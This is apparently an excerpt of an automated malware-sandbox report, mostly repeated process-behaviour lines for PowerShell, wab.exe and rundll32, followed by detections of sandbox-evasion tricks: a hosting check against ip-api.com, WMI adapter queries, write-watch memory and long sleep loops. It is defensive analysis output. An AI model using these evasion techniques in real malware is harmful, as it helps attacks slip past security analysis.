Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24350000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598373	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597816	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597524	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597355	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593947	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592780	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591954	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591579	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591110	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4936	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4913	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6469	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3327	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3539	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 6187	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 7336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep count: 6469 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 3327 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056	Thread sleep count: 3539 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056	Thread sleep count: 6187 > 30	Jump to behavior
